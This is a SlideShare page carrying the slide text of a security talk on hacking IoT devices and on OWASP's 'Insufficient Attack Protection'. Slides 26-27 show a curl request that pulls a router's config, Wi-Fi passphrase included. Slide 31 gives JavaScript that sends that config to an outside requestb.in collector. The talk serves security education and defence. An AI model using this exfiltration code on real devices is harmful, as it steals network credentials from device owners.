Hacking the Internet of Things for Fun & Profit
Download as PPTX, PDF•0 likes•95 views
The document discusses major security vulnerabilities in applications and APIs, highlighting the insufficient attack protection that many lack. It emphasizes the need for advanced attack detection, logging, and response capabilities as well as the importance of rapid patch deployment. Additionally, it includes technical details related to data exfiltration and device configuration.
![$('#maintable')
.find('tr')
.find('td:eq(2)')
.toArray()
.map(e => e.innerText)
.map(e => e.replace(/[D]/g, ''))
.map(e => parseInt(e))
.reduce((a,b) => isNaN(b) ? a : a + b)](https://image.slidesharecdn.com/hackingtheinternetofthingsforfunprofit-170421221716/85/Hacking-the-Internet-of-Things-for-Fun-Profit-5-320.jpg)
Hacking the Internet of Things for Fun & Profit
- 5. $('#maintable') .find('tr') .find('td:eq(2)') .toArray() .map(e => e.innerText) .map(e => e.replace(/[D]/g, '')) .map(e => parseInt(e)) .reduce((a,b) => isNaN(b) ? a : a + b)
- 26. curl http://192.168.1.64/ajax/get_config?type=10 -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive'
- 27. curl http://192.168.1.64/ajax/get_config?type=10 -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' <wirelessProfile SSID="TELE2-E5340F"> <wirelessSecurity enabled="true"> <Mode passPhrase="9118C27AXX"> WPA2-AES </Mode> </wirelessSecurity> </wirelessProfile>
- 31. var apGet = new XMLHttpRequest() apGet.onreadystatechange = function() { exfil = new XMLHttpRequest() exfil.open("post", "http://requestb.in/1f05afw1", true) exfil.send(apGet.responseText) console.log(apGet.responseText) } apGet.open("get", "/ajax/get_config?type=10", true) apGet.send()
- 36. A7 - Insufficient Attack Protection The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.
- 39. Security Analysis Log Analysis Security Visualisation Realtime Response
- 42. Load Balancer sandbox 1.0 application 1.1
- 43. sandbox 1.0 application 1.1 Load Balancer
- 45. Web Application Security and insight Please, hack or rate in the app! @EnableBitSensor Ruben van Vreeland [email protected]